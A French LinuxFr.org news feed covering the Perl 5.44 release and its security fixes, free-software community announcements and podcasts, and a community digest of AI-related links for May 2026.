Linuxfr.org
Perl 5.44 est sorti
Perl est un langage de programmation créé par Larry Wall en 1987 (Artistic License et GPL). La version 5.44.0 est parue le 15 juillet 2026. La précédente 5.42.0 était initialement parue en juillet 2025, avec un dernier correctif 5.42.2 publié en mars 2026.
Parmi les améliorations principales :
- paramètres nommés dans les signatures
- foreach avec plusieurs variables peuvent maintenant utiliser des alias de références
- fonctionnement amélioré des motifs d’expressions régulières avec /xx
- prise en charge d’Unicode 17.0
- nouvelle source d’entropie pour l’initialisation du générateur de nombres pseudo-aléatoires
Mais aussi 3 correctifs sécurité, quelques incompatibilités, des améliorations de performances, de documentation, etc. Reportez-vous aux notes de version pour avoir tous les détails. La suite de la dépêche décrit les améliorations principales et les correctifs sécurité.
- lien nᵒ 1 : Perl sur Wikipedia
- lien nᵒ 2 : Guide Perl - Débuter et progresser en Perl
- lien nᵒ 3 : L'association Les Mongueurs de Perl
- lien nᵒ 4 : Perl 5.44.0 Release notes
Cette version de Perl apporte la possibilité de passer des paramètres de fonction par paire nom/valeur plutôt que par position.
sub f ($x, $y, :$alpha, :$beta = undef) { ... } f( 123, 456, alpha => 789 );Cette fonctionalité est considérée comme étant experimentale et est décrité en détail dans la partie "Signatures" de perlsub.
Les foreach avec plusieurs variables peuvent maintenant utiliser des alias de référencesPerl version 5.22 avait apporté des alias à des références, permettant à la variable d’itération d’une boucle foreach de créer de nouveaux alias à une référence. Avec Perl 5.36, on pouvait itérer sur plusieurs variables à la fois dans une boucle foreach. Dans cette version de Perl, ces deux fonctionnalités peuvent être utilisées ensemble, ce qui permet d’avoir plusieurs variables d’itération, certaines pouvant être des alias de références.
use v5.44; use feature qw( refaliasing declared_refs ); my %hash = ( one => [1], two => [2, 2], ); foreach my ( $key, \@items ) ( %hash ) { say "The $key array contains: @items"; } Fonctionnement amélioré des motifs d’expressions régulières avec /xxÀ titre expérimental, le modificateur de motif /xx permet aux classes de caractères (par exemple, [a-zA-Z]) de s’étendre sur plusieurs lignes et de contenir des commentaires ; il signale également les cas potentiels où une partie du motif a été interprétée comme un commentaire au lieu de l’interprétation voulue. Ce comportement est activé par la directive use feature "enhanced_xx". Voir la section « /x et /xx » dans la documentation perlre.
Prise en charge d’Unicode 17.0Le support Unicode de Perl passe à la version 17.
Nouvelle source d’entropie pour l’initialisation du PRNGPerl utilise désormais l’appel système getentropy() pour obtenir des octets aléatoires adaptés à l’initialisation de son PRNG interne. Auparavant, Perl lisait des octets bruts depuis le périphérique /dev/urandom. Perl procède désormais à cette initialisation dans l’ordre suivant (en passant à l’étape suivante en cas d’échec) :
- getentropy() sur les systèmes prenant en charge cet appel (Linux, BSD, macOS)
- /dev/urandom sur les systèmes qui en disposent
- Une empreinte (hash) de variables d’état internes : temps Unix, identifiant de processus et valeur de pointeur
Notez que le PRNG interne ne convient toujours pas aux applications nécessitant une sécurité élevée. Consultez la section « rand EXPR » dans perlfunc pour les aspects liés à la sécurité.
Securité CVE-2026-8376 - Débordement de tampon dans Perl_study_chunkLa fonction Perl_study_chunk, située dans regcomp_study.c, vérifiait la taille du tampon de sous-chaîne concaténée en nombre de caractères plutôt qu’en octets. Dans une version 32 bits, ceci peut entraîner un débordement de tampon, provoquant des écritures hors limites.
CVE-2026-57432 - Débordement de tampon dans S_measure_structSi l’on appelle pack ou unpack pour traiter une structure dont la taille calculée est trop importante pour tenir en mémoire, un dépassement d’entier peut arriver et entraîner un débordement de tampon. Ce cas de figure se produit généralement lorsque l’on utilise un nombre élevé comme facteur de répétition pour un élément.
CVE-2026-13221 - Regex trie 16-bit field overflowL’optimisation de type « trie » (arbre de recherche) du moteur d’expressions régulières pouvait subir un dépassement lors du traitement d’une alternance comportant plus de 65 000 branches. Cela pouvait entraîner à la fois des faux positifs et des faux négatifs pour ces expressions régulières.
Télécharger ce contenu au format EPUBCommentaires : voir le flux Atom ouvrir dans le navigateur
L'April invite à participer à la « Fête des Possibles » 2026 pour toucher de nouveaux publics
Une nouvelle édition de la Fête des Possibles, initiée et coordonnée par le Collectif pour une Transition Citoyenne, aura lieu du 11 septembre au 11 octobre 2026. Des centaines d'événements seront organisés partout en France et en Belgique pour valoriser les actions concrètes en faveur d'un avenir plus durable et solidaire.
Le logiciel libre a toute sa place dans cette dynamique ! Ainsi, l'April, partenaire de la Fête des Possibles, invite les organisations locales de promotion du logiciel libre à proposer un voire plusieurs rendez-vous dans le cadre de cette initiative.
Comment participer ?- Si vous avez déjà prévu un événement autour du logiciel libre ou de la culture libre entre le 11 septembre et le 11 octobre, pensez à l'ajouter sur le site de la Fête des Possibles, en indiquant la thématique « Vivre et faire autrement » ;
- Vous pouvez aussi proposer un rendez-vous ad hoc pour la Fête des Possibles ! Dans ce cas, n'hésitez pas à l'ajouter sur le site de l'initiative dès que vous connaissez la date, il sera toujours possible d'affiner la présentation plus tard ;
- Vous pouvez, sans doute aussi, vous « greffer » à un événement déjà prévu, en proposant à l'organisation de prévoir de la place pour de la sensibilisation au logiciel libre : vérifiez sur la carte des rendez-vous si des événements sont déjà programmés près de chez vous.
- Votre événement se déroule en ligne ? Le formulaire de soumission permet de l’indiquer !
N'oubliez pas d'inscrire votre événement également sur l'Agenda du Libre, en ajoutant le mot-clé fete-des-possibles-2026. Cela permettra à l'April de mettre en valeur la contribution des organisations locales de promotion du Libre à la Fête des Possibles
TacTic, une ASBL Tip Top - « Libre à vous ! » du 7 juillet 2026 - Podcasts et références
282ᵉ émission « Libre à vous ! » de l’April. Podcast et programme :
- sujet principal : « Tactic, une ASBL Tip Top » (Association sans but non lucratif)
- la chronique Le truc que (presque) personne n’a vraiment compris mais qui nous concerne toutes et tous de Benjamin Bellamy : « Conseils de lectures pour l’été »
- la chronique Que libérer d’autre que du logiciel avec Antanak, sur « Les assises de l’attention » (rediffusion du 10 février 2026)
C'était la dernière émission de cette 9ᵉ saison de « Libre à vous ! »
On se retrouve en septembre, sans doute le 8, pour une nouvelle saison.
Toujours en direct chaque mardi de 15 h 30 à 17 h sur 93,1 FM en Île‐de‐France et sur le site Web de la radio Cause Commune.
En attendant, si vous avez manqué une émission ou envie de réécouter un sujet qui vous a particulièrement plu, nous vous proposons cette page bien pratique qui regroupe l'ensemble des podcast, par émission et par sujet
Nous vous souhaitons bonne écoute et un très bel été
- lien nᵒ 1 : Podcast de l'émission
- lien nᵒ 2 : Les références pour l'émission et les podcasts par sujets
- lien nᵒ 3 : La transcription de l'émission
- lien nᵒ 4 : S'abonner au podcast
- lien nᵒ 5 : https://libreavous.org/rss
- lien nᵒ 6 : Libre à vous !
- lien nᵒ 7 : Radio Cause Commune
- lien nᵒ 8 : Les podcasts « Libre à vous ! » pour accompagner votre été !
Commentaires : voir le flux Atom ouvrir dans le navigateur
Revue de presse de l’April pour la semaine 29 de l’année 2026
Cette revue de presse sur Internet fait partie du travail de veille mené par l’April dans le cadre de son action de défense et de promotion du logiciel libre. Les positions exposées dans les articles sont celles de leurs auteurs et ne rejoignent pas forcément celles de l’April.
- [Les Echos] Aussi efficace, moins cher mais moins déployé… le paradoxe de l'IA open source (€)
- [Numerama] «Sans exception», Musk promet l'open source total de X
- [clubic.com] La France dépend à 80 % des logiciels américains, déplorent les députés, qui militent pour l'open source
- lien nᵒ 1 : April
- lien nᵒ 2 : Revue de presse de l'April
- lien nᵒ 3 : Revue de presse de la semaine précédente
- lien nᵒ 4 :
Appel à projets tuteurés colibre 2026-2027
Cette année encore (mais pour la dernière fois) la licence professionnelle en communication CoLibre, de l'Université Lyon2, vous invite à proposer une action de communication pour votre structure (association, collectif, entreprise…) qui fera l'objet d'un projet tuteuré pour un des groupes de notre promotion 2026-2027.
L'appel est ouvert jusqu'au 15 septembre (sans possibilité d'allongement).
- lien nᵒ 1 : Blog de CoLIbre
- lien nᵒ 2 : Appel à projets tuteurés
- lien nᵒ 3 : Mars 2026 : Non renouvellement de l’accréditation de la licence pro CoLibre pour la rentrée 2027
Il est important de penser que l'action fera d'abord l'objet d'une étude de faisabilité et, dans la mesure du possible, sera réalisée par le groupe qui en a la charge.
Il faut garder en tête que les étudiantes et étudiants ne doivent utiliser que des logiciels libres pour réaliser leurs travaux et que par ailleurs tous les frais engagés doivent être pris en charge par l'offreur.
Par expérience, il est important que la structure soit en mesure de venir rencontrer le groupe ou le faire venir "en vrai", il faut aussi avoir une part de disponibilité pour une réunion mensuelle minimum avec le groupe et considérer le groupe comme force de proposition et pas seulement comme exécutant à pas cher d'une action de communication.
Le formulaire de proposition est disponible sur le site de la promotion tout comme des informations sur les projets tuteurés passés.
Télécharger ce contenu au format EPUBCommentaires : voir le flux Atom ouvrir dans le navigateur
Podcast Projets Libres saison 4 épisode 21 : postmarketOS, Linux pour faire durer votre smartphone pendant 10 ans !
L'équipe de Projets Libres est ravie de vous présenter un épisode de la série sur la libération des smartphones, dédié à la distribution Linux mobile postmarketOS.
Dans ce long entretien avec Antoine Martin et Ranny Bergamotte, deux contributeurs de confiance du projet, nous abordons une variété de sujets :
- l'histoire du projet
- ses différentes composantes (système, environnements de bureau, etc)
- son équipe
- son organisation
- sa gouvernance et ses évolutions actuelles
- son rapport avec les différents projets upstream
- son financement
- son système de tests matériel distribué par internet (hardware-CI)
Nous remercions chaleureusement Ranny pour sa réécriture complète de la traduction anglaise.
- lien nᵒ 1 : Lien vers l'épisode
- lien nᵒ 2 : Soutenir le podcast
- lien nᵒ 3 : Le site de postmarketOS
- lien nᵒ 4 : Soutenir postmarketOS sur OpenCollective
- lien nᵒ 5 : Traduction en anglais de l'épisode
Commentaires : voir le flux Atom ouvrir dans le navigateur
Veille communautaire sur des intelligences artificielles du mois de mai 2026
La série de dépêches de LinuxFr.org sur la veille concernant des intelligences artificielles a repris depuis le 16 mai 2026 avec une nouvelle formule.
Cette série perpétue l’initiative de valoriser les contenus pertinents des contributrices et contributeurs de LinuxFr.org en rapport avec des IA tels que les dépêches, journaux et liens. L’ajout des synthèses de la plupart des articles de presse et des contributions de la communauté LinuxFr.org sont proposés être envisagé à terme, selon les disponibilités des bénévoles.
(Mème original : They're the same picture, captures d'écran de la série « The Office » (US), épisode « Search Committee » diffusé en 2011. Version Framamèmes dessinée en avril 2025 par Gee (CC-0).)
- Avant-propos
- Méthodologie de sélection des contenus communautaires
- Quelques statistiques sur les contenus retenus
- Focus sur…
- La détection des deepfakes
-
Une sélection des contenus par thème
- Campus IA et Choose France
- Centres de donnée
- Communauté de LinuxFr.org
- Cybersécurité
- Éducation
- Économie et droit
- Environnement
- Internet mort
- Mondes artistiques et culturels
- Logiciels libres
- Jeux vidéos
- Programmation
- Recherche scientifique
- Religion
- Retour d’expérience
- Revues de presse
- Santé
- Société
- Souveraineté
- Annexe
NB: si vous avez déjà pris connaissance de la première dếpêche «nouvelle formule»1 et que vous n’êtes pas intéressé(e) pour consulter les résultats définitifs du sondage sur la reprise de la série, vous pouvez aller directement à la partie «Quelques statistiques sur les contenus retenus»
Cette dépêche est dédiée à la veille sur des intelligences artificielles2 faite par des contributions communautaires sur des contenus de LinuxFr.org et reprend une partie de l’initiative amorcée par la série « Nouvelles sur l’IA »3 qui s’est arrêtée le 6 avril 20264 5.
Comme recenser au fil de l’eau du contenu communautaire pertinent demande un travail conséquent pour la rédaction de la dépêche, la décision de continuer la série sous une nouvelle formule a été faite à la vue des résultats d’un sondage publié le 1er mai 2026.6 7
La première dépêche de la série publiée le 16 mai 20261 a été primée comme meilleure contribution de mai 2026 par l’équipe de LinuxFr.org8.
Méthodologie de sélection des contenus communautairesComme dans la précédente série des « Nouvelles sur l’IA », les contenus communautaires sont répertoriés selon ces deux critères :
- La présence d’une étiquette intelligence_artificielle9 (indication d’un rapport avec le thème de la dépêche)
- Un score strictement supérieur à zéro au moment du recensement
Certains contenus non recensés en raison du second critère peuvent être visualisés en s’aidant de la recherche par étiquette9.
Quelques statistiques sur les contenus retenusDu 1er mai au 31 mai, les contenus retenus sont:
- 4 dépêches
- 13 journaux
- 2 posts de forum
- 1 sujet de suivi
- 70 liens
Au total, 90 contenus répondant aux critères de sélection sont recensés dans la présente dépêche.
Focus sur…Dans cette seconde dépêche, des synthèses10 sont proposées sur les sujets concernant l’incidence de l’IA générative sur les visites de site web et la détection des deepfakes.
L’incidence de l’IA générative sur les visites de site webLe lien suivant est un article provenant de la communauté francophone de Minecraft :
- Ce qui se passe sur Minecraft.fr quand vous posez une question à une IA (pareil sur LinuxFr.org) (lien original, discussion LinuxFR) ;
Elle est relayée par Benoît Sibaud car elle fait écho à la situation qu’a subi LinuxFr.org avec les activités des bots IA.
L’équipe du site Minecraft.fr a constaté une situation paradoxale depuis la concurrence des plaformes d’IA générative grand public avec des moteurs de recherche conventionnels. D’un côté, les statistiques de recherche par mot clé mise à disposition indique une augmentation des apparitions de Minecraft.fr dans les réponses aux requêtes. D’un autre côté, la fréquentation effective du site par des utilisateurs a diminué, ce qui occasionne une perte de recette du site par la publicité ciblée.
L’équipe de Minecraft incrimine la fonction de résumé de texte par des IA génératives grand public comme responsable de la baisse des recettes publicitaires couplés à une hausse des charges due aux scannages du site par des bots IA.
La détection des deepfakesLe lien suivant est un article provenant de la revue scientifique américaine Science:
- Identifier les deepfakes (lien original, discussion LinuxFR) ;
L’article en ligne retrace les travaux11 de Hany Farid, un enseignant-chercheur de l’Université de Berkeley qui s’était distingué pour établir l’authenticité d’une vidéo sur l’attaque par erreur d’une école primaire en Iran par l’armée américaine durant l’opération Epic Fury en février 2026.
L’enseignant-chercheur détaille certaines techniques, la plupart manuelles mais relativement simples, qui s’appuient sur les défauts des IA génératives. Parmi celles-ci, l’usage des lignes de fuite pour vérifier la cohérence des images permet de détecter de manière efficace la plupart des deepfakes.
Vers la fin de l’article du magazine, l’enseignant-chercheur confie sa difficulté croissante à analyser les vidéos suspectes suite à l’explosion du nombre de deepfakes fabriqués et avertit que son savoir-faire, bien qu’il contribue à compliquer la tâche de la plupart des acteurs malveillants, ne permettrait pas de détecter du faux contenu à 100%.
Une sélection des contenus par thèmeLes thèmes ci-dessous sont proposés pour aider des lectrices et des lecteurs à retrouver les contenus qui les intéressent. Les thèmes sont pour le moment suggérés manuellement par des contributrices et des contributeurs à la dépêche.10
Campus IA et Choose France Liens- MGX, le très peu rassurant fonds émirati derrière l’immense centre de données « souverain » prévu en Seine-et-Marne (lien original, discussion LinuxFR) ;
- « Hors norme » : le gigantesque projet Campus IA relance la lutte contre les data centers (lien original, discussion LinuxFR) ;
- MGX, le très peu rassurant fonds émirati derrière l’immense centre de données « souverain » prévu en Seine-et-Marne (lien original, discussion LinuxFR) ;
- « Hors norme » : le gigantesque projet Campus IA relance la lutte contre les data centers (lien original, discussion LinuxFR) ;
- Aux États-Unis, des centaines de collectifs s’opposent aux data centers, et gagnent parfois (lien original, discussion LinuxFR) ;
- AI boom means US is now ‘investing more’ in fossil-fuel power than China (lien original, discussion LinuxFR) ;
- Les IA sont-elles courtoises ?
- [LinuxFr] Confiance, IA et contenu
- IA : mon parcours initiatique
- Auto-héberger ses IA
- Publication de contenus augmentés par l’IA
- Afin de lutter contre la désinformation, les contenus générés par IA devront être tatoués… sauf s’ils sont vérifiés par un humain (lien original, discussion LinuxFR) ;
- Linus siffle la fin de la récré sur les patchs générés par lA les yeux fermés. (lien original, discussion LinuxFR) ;
- L’IA générative dépasse les étudiant(e)s… et après ? (lien original, discussion LinuxFR) ;
- Publication du Guide juridique sur l’utilisation des données patrimoniales dans le cadre de l’intelligence artificielle générative (lien original, discussion LinuxFR) ;
- IA : “Un secteur économique se construit sur le pillage généralisé” des œuvres ( lien original, discussion LinuxFR ) ;
- Elon Musk insulte les magistrats français chargés d’enquêter sur de possibles abus de son réseau social X ( lien original, discussion LinuxFR ) ;
- C’est l’heure de passer à la caisse… ( lien original, discussion LinuxFR ) ;
- MGX, le très peu rassurant fonds émirati derrière l’immense centre de données « souverain » prévu en Seine-et-Marne ( lien original, discussion LinuxFR ) ;
- Surveiller et punir au travail grâce à l’IA ( lien original, discussion LinuxFR ) ;
- Les lunettes connectées : la CNIL appelle à la vigilance ( lien original, discussion LinuxFR ) ;
- Nvidia accusé d’avoir volontairement conçu des scripts pour pirater des livres ( lien original, discussion LinuxFR ) ;
- Développement de l’IA dans les entreprises: une menace pour l’emploi des femmes ( lien original, discussion LinuxFR ) ;
- Meta Employee Attacks Zuckerberg for Collecting Every Employee Keystroke ( lien original, discussion LinuxFR ) ;
- Samsung : 50 000 salariés menacent de faire grève et pourraient bloquer toute l’industrie ( lien original, discussion LinuxFR ) ;
- Where are all the data centers? ( lien original, discussion LinuxFR ) ;
- Britannica pillé par ChatGPT : comment Umberto Eco avait prévu ce vertige ( lien original, discussion LinuxFR ) ;
- Retour à la réalité : Google annonce de nouvelles “limites” sur Gemini : il faut maintenant apprendre à économiser l’IA comme on économise l’électricité ( lien original, discussion LinuxFR ) ;
- Le cauchemar de Lessig. If « Code Is Law », what da fuck is « Vibe Coding » ? ( lien original, discussion LinuxFR ) ;
- « Hors norme » : le gigantesque projet Campus IA relance la lutte contre les data centers ( lien original, discussion LinuxFR ) ;
- SpaceX Files Its S-1: Full Breakdown Of The Largest IPO In American History [Introduction en bourse de SpaceX / xAI / X] ( lien original, discussion LinuxFR ) ;
- Microsoft reports are exposing AI’s real cost problem: Using the tech is more expensive than paying human employees ( lien original, discussion LinuxFR ) ;
- En Suède, le fiasco du premier café dirigé par une IA ( lien original, discussion LinuxFR ) ;
- L’IA est en train de tuer les ordiphones bon marché ( lien original, discussion LinuxFR ) ;
- En Corée du Sud, des employés de Samsung vont toucher une prime record de 290 000 euros en moyenne ( lien original, discussion LinuxFR ) ;
- Uber commence à trouver l’addition de l’IA un peu salée ( lien original, discussion LinuxFR ) ;
- AI boom means US is now ‘investing more’ in fossil-fuel power than China ( lien original, discussion LinuxFR ) ;
- Dans la Silicon Valley, l’intelligence artificielle prend des airs de divinité ( lien original, discussion LinuxFR ) ;
- IA : SoftBank va investir 75 milliards d’euros dans des infrastructures en France ( lien original, discussion LinuxFR ) ;
- les protestations contre l’IA se multiplient ( lien original, discussion LinuxFR ) ;
- Retour à la réalité : Google annonce de nouvelles “limites” sur Gemini : il faut maintenant apprendre à économiser l’IA comme on économise l’électricité ( lien original, discussion LinuxFR ) ;
- « Hors norme » : le gigantesque projet Campus IA relance la lutte contre les data centers ( lien original, discussion LinuxFR ) ;
- AI boom means US is now ‘investing more’ in fossil-fuel power than China ( lien original, discussion LinuxFR ) ;
- Centres de données : pourquoi leur refroidissement consomme autant d’eau (et pourquoi cela pose problème) ( lien original, discussion LinuxFR ) ;
- Ce qui se passe sur Minecraft.fr quand vous posez une question à une IA (pareil sur LinuxFr.org) ( lien original, discussion LinuxFR ) ;
- The boring Internet( lien original, discussion LinuxFR ) ;
- Internet Archive crée une fondation suisse pour sauver des archives ( lien original, discussion LinuxFR ) ;
- La recherche Google telle qu’on la connaît va disparaître cet été ( lien original, discussion LinuxFR ) ;
- “The open web is on its way out” – Google Changes Its Search Box for the First Time in 25 Years ( lien original, discussion LinuxFR ) ;
- DuckDuckGo Installs Up 30% After Google Announced AI Search ( lien original, discussion LinuxFR ) ;
- Cinéma – Les acteurs et les scénarios générés par IA exclus par l’Académie des Oscars ( lien original, discussion LinuxFR ) ;
- Mozilla industrialise la chasse aux bugs dans Firefox avec l’IA ( lien original, discussion LinuxFR ) ;
- L’objectif de Fedora pour un « bureau IA pour développeur » // Garçon ? Il y a un llm dans ma distrib ! ( lien original, discussion LinuxFR ) ;
- WordPress 7.0 “Armstrong” ( lien original, discussion LinuxFR ) ;
- Linus siffle la fin de la récré sur les patchs générés par lA les yeux fermés. ( lien original, discussion LinuxFR ) ;
- Flathub interdit désormais les applis codées avec de l’IA ( lien original, discussion LinuxFR ) ;
- Spacewar
- Un code généré par IA est-il obligatoirement du « AI slop » ?
- IA : mon parcours initiatique
- Auto-héberger ses IA
- Audition de la direction de Mistral AI et Solo dev
- Coders at work – v2026
- Real signals or artificial stereotypes? (Copilot propageant des stéréotypes en faisant semblant d’analyser des données) ( lien original, discussion LinuxFR ) ;
- Mozilla industrialise la chasse aux bugs dans Firefox avec l’IA ( lien original, discussion LinuxFR ) ;
- IA au Kenya: derrière les entreprises de sous-traitance, l’essor d’une nouvelle classe ouvrière ( lien original, discussion LinuxFR ) ;
- L’IA “locale” de chrome n’est plus uniquement locale ( lien original, discussion LinuxFR ) ;
- Whoa, I produced this prototype so fast! I have super powers! ( lien original, discussion LinuxFR ) ;
- L’objectif de Fedora pour un « bureau IA pour développeur » // Garçon ? Il y a un llm dans ma distrib ! ( lien original, discussion LinuxFR ) ;
- Le culte du TDD et des LLMs ( lien original, discussion LinuxFR ) ;
- Nvidia accusé d’avoir volontairement conçu des scripts pour pirater des livres ( lien original, discussion LinuxFR ) ;
- Chris Lattner à propos du compilateur créé par Claude ( lien original, discussion LinuxFR ) ;
- Retour à la réalité : Google annonce de nouvelles “limites” sur Gemini : il faut maintenant apprendre à économiser l’IA comme on économise l’électricité ( lien original, discussion LinuxFR ) ;
- Le cauchemar de Lessig. If « Code Is Law », what da fuck is « Vibe Coding » ? ( lien original, discussion LinuxFR ) ;
- WordPress 7.0 “Armstrong” ( lien original, discussion LinuxFR ) ;
- Microsoft reports are exposing AI’s real cost problem: Using the tech is more expensive than paying human employees ( lien original, discussion LinuxFR ) ;
- Reddit /r/programming banni les contenus IA et à propos d’IA ( lien original, discussion LinuxFR ) ;
- Linus siffle la fin de la récré sur les patchs générés par lA les yeux fermés. ( lien original, discussion LinuxFR ) ;
- Uber commence à trouver l’addition de l’IA un peu salée ( lien original, discussion LinuxFR ) ;
- Flathub interdit désormais les applis codées avec de l’IA ( lien original, discussion LinuxFR ) ;
- Terence Tao et l’IA : un Médaillé Fields réinvente la pratique mathématique ( lien original, discussion LinuxFR ) ;
- Influential study touting ChatGPT in education retracted over red flags ( lien original, discussion LinuxFR ) ;
- Une IA résoud un problème ouvert d’Erdos célèbre, commentaire de matheux ( lien original, discussion LinuxFR ) ;
- The boring Internet( lien original, discussion LinuxFR ) ;
- « J’ai postulé pour être pape » : utiliser ChatGPT et perdre contact avec la réalité ( lien original, discussion LinuxFR ) ;
- Encyclique sur l’IA : l’analyse de La Croix ( lien original, discussion LinuxFR ) ;
- Encyclique sur l’IA : l’analyse de Le Grand Continent ( lien original, discussion LinuxFR ) ;
- L’ingénieur du pape ( lien original, discussion LinuxFR ) ;
- Dans la Silicon Valley, l’intelligence artificielle prend des airs de divinité ( lien original, discussion LinuxFR ) ;
- Frontier AI Models Are Doing Something Absolutely Bizarre When Asked to Diagnose Medical X-Rays ( lien original, discussion LinuxFR ) ;
- « L’AI Brain Fry », mal qui frappe les utilisateurs intensifs de l’IA ( lien original, discussion LinuxFR ) ;
- « J’ai postulé pour être pape » : utiliser ChatGPT et perdre contact avec la réalité ( lien original, discussion LinuxFR ) ;
- Publication du Guide juridique sur l’utilisation des données patrimoniales dans le cadre de l’intelligence artificielle générative ( lien original, discussion LinuxFR ) ;
- Faut-il saboter les datacenters ? (entretien avec Thomas Dekeyser) ( lien original, discussion LinuxFR ) ;
- Identifier les deep fakes ( lien original, discussion LinuxFR ) ;
- Internet Archive crée une fondation suisse pour sauver des archives ( lien original, discussion LinuxFR ) ;
- Elon Musk insulte les magistrats français chargés d’enquêter sur de possibles abus de son réseau social X ( lien original, discussion LinuxFR ) ;
- Real signals or artificial stereotypes? (Copilot propageant des stéréotypes en faisant semblant d’analyser des données) ( lien original, discussion LinuxFR ) ;
- IA au Kenya: derrière les entreprises de sous-traitance, l’essor d’une nouvelle classe ouvrière ( lien original, discussion LinuxFR ) ;
- MGX, le très peu rassurant fonds émirati derrière l’immense centre de données « souverain » prévu en Seine-et-Marne ( lien original, discussion LinuxFR ) ;
- Surveiller et punir au travail grâce à l’IA ( lien original, discussion LinuxFR ) ;
- Les lunettes connectées : la CNIL appelle à la vigilance ( lien original, discussion LinuxFR ) ;
- Whoa, I produced this prototype so fast! I have super powers! ( lien original, discussion LinuxFR ) ;
- Entretien avec Abel Quentin, auteur de “Sanctuaires, résister à l’invasion de l’IA générative” (matinale de France Inter) ( lien original, discussion LinuxFR ) ;
- Développement de l’IA dans les entreprises: une menace pour l’emploi des femmes ( lien original, discussion LinuxFR ) ;
- Meta Employee Attacks Zuckerberg for Collecting Every Employee Keystroke ( lien original, discussion LinuxFR ) ;
- Britannica pillé par ChatGPT : comment Umberto Eco avait prévu ce vertige ( lien original, discussion LinuxFR ) ;
- les protestations contre l’IA se multiplient ( lien original, discussion LinuxFR ) ;
- La recherche Google telle qu’on la connaît va disparaître cet été ( lien original, discussion LinuxFR ) ;
- Afin de lutter contre la désinformation, les contenus générés par IA devront être tatoués… sauf s’ils sont vérifiés par un humain ( lien original, discussion LinuxFR ) ;
- Retour à la réalité : Google annonce de nouvelles “limites” sur Gemini : il faut maintenant apprendre à économiser l’IA comme on économise l’électricité ( lien original, discussion LinuxFR ) ;
- Le cauchemar de Lessig. If « Code Is Law », what da fuck is « Vibe Coding » ? ( lien original, discussion LinuxFR ) ;
- « Hors norme » : le gigantesque projet Campus IA relance la lutte contre les data centers ( lien original, discussion LinuxFR ) ;
- Microsoft reports are exposing AI’s real cost problem: Using the tech is more expensive than paying human employees ( lien original, discussion LinuxFR ) ;
- En Suède, le fiasco du premier café dirigé par une IA ( lien original, discussion LinuxFR ) ;
- L’IA est en train de tuer les ordiphones bon marché ( lien original, discussion LinuxFR ) ;
- Encyclique sur l’IA : l’analyse de La Croix ( lien original, discussion LinuxFR ) ;
- Encyclique sur l’IA : l’analyse de Le Grand Continent ( lien original, discussion LinuxFR ) ;
- Aux États-Unis, des centaines de collectifs s’opposent aux data centers, et gagnent parfois ( lien original, discussion LinuxFR ) ;
- L’ingénieur du pape ( lien original, discussion LinuxFR ) ;
- En Corée du Sud, des employés de Samsung vont toucher une prime record de 290 000 euros en moyenne ( lien original, discussion LinuxFR ) ;
- I Am Retiring from Tech to Live Offline ( lien original, discussion LinuxFR ) ;
- Dans la Silicon Valley, l’intelligence artificielle prend des airs de divinité ( lien original, discussion LinuxFR ) ;
- Peut-on connaître le monde uniquement par l’écrit ? ( lien original, discussion LinuxFR ) ;
- IA : SoftBank va investir 75 milliards d’euros dans des infrastructures en France ( lien original, discussion LinuxFR ) ;
- Elon Musk insulte les magistrats français chargés d’enquêter sur de possibles abus de son réseau social X ( lien original, discussion LinuxFR ) ;
- MGX, le très peu rassurant fonds émirati derrière l’immense centre de données « souverain » prévu en Seine-et-Marne ( lien original, discussion LinuxFR ) ;
- Les lunettes connectées : la CNIL appelle à la vigilance ( lien original, discussion LinuxFR ) ;
- IA : SoftBank va investir 75 milliards d’euros dans des infrastructures en France ( lien original, discussion LinuxFR ) ;
Ci-dessous sont rassemblés des contenus sélectionnés dans l’ordre chronologique, dont une partie qui n’ont pas été classés parmi les thèmes.
Dépêches- Revue de presse de l’April pour la semaine 20 de l’année 2026
- Revue de presse de l’April pour la semaine 21 de l’année 2026
- Sortie de la version 7.0 de Datafari, moteur de recherche open source « intelligent » pour entreprise
- Revue de presse – mai 2026
- Les IA sont-elles courtoises ?
- DELEGATE-52 : Les LLM corrompent vos documents
- Spacewar
- Un code généré par IA est-il obligatoirement du « AI slop » ?
- [LinuxFr] Confiance, IA et contenu
- Écrire un texte dans des systèmes d’écriture différents
- LinuxFr.org : première quinzaine de mai 2026
- IA : mon parcours initiatique
- Auto-héberger ses IA
- Si c’est Microsoft qui le dit…
- Audition de la direction de Mistral AI et Solo dev
- Publication de contenus augmentés par l’IA
- Coders at work – v2026
- Frontier AI Models Are Doing Something Absolutely Bizarre When Asked to Diagnose Medical X-Rays ( lien original, discussion LinuxFR ) ;
- Cinéma – Les acteurs et les scénarios générés par IA exclus par l’Académie des Oscars ( lien original, discussion LinuxFR ) ;
- « L’AI Brain Fry », mal qui frappe les utilisateurs intensifs de l’IA ( lien original, discussion LinuxFR ) ;
- Publication du Guide juridique sur l’utilisation des données patrimoniales dans le cadre de l’intelligence artificielle générative ( lien original, discussion LinuxFR ) ;
- Faut-il saboter les datacenters ? (entretien avec Thomas Dekeyser) ( lien original, discussion LinuxFR ) ;
- En France, deux tiers des jeunes considèrent l’IA comme « un conseiller de vie » ( lien original, discussion LinuxFR ) ;
- Ce qui se passe sur Minecraft.fr quand vous posez une question à une IA (pareil sur LinuxFr.org) ( lien original, discussion LinuxFR ) ;
- IA : “Un secteur économique se construit sur le pillage généralisé” des œuvres ( lien original, discussion LinuxFR ) ;
- The boring Internet( lien original, discussion LinuxFR ) ;
- Identifier les deep fakes ( lien original, discussion LinuxFR ) ;
- Terence Tao et l’IA : un Médaillé Fields réinvente la pratique mathématique ( lien original, discussion LinuxFR ) ;
- Internet Archive crée une fondation suisse pour sauver des archives ( lien original, discussion LinuxFR ) ;
- Elon Musk insulte les magistrats français chargés d’enquêter sur de possibles abus de son réseau social X ( lien original, discussion LinuxFR ) ;
- C’est l’heure de passer à la caisse… ( lien original, discussion LinuxFR ) ;
- Influential study touting ChatGPT in education retracted over red flags ( lien original, discussion LinuxFR ) ;
- Real signals or artificial stereotypes? (Copilot propageant des stéréotypes en faisant semblant d’analyser des données) ( lien original, discussion LinuxFR ) ;
- Mozilla industrialise la chasse aux bugs dans Firefox avec l’IA ( lien original, discussion LinuxFR ) ;
- IA au Kenya: derrière les entreprises de sous-traitance, l’essor d’une nouvelle classe ouvrière ( lien original, discussion LinuxFR ) ;
- MGX, le très peu rassurant fonds émirati derrière l’immense centre de données « souverain » prévu en Seine-et-Marne ( lien original, discussion LinuxFR ) ;
- Surveiller et punir au travail grâce à l’IA ( lien original, discussion LinuxFR ) ;
- Les lunettes connectées : la CNIL appelle à la vigilance ( lien original, discussion LinuxFR ) ;
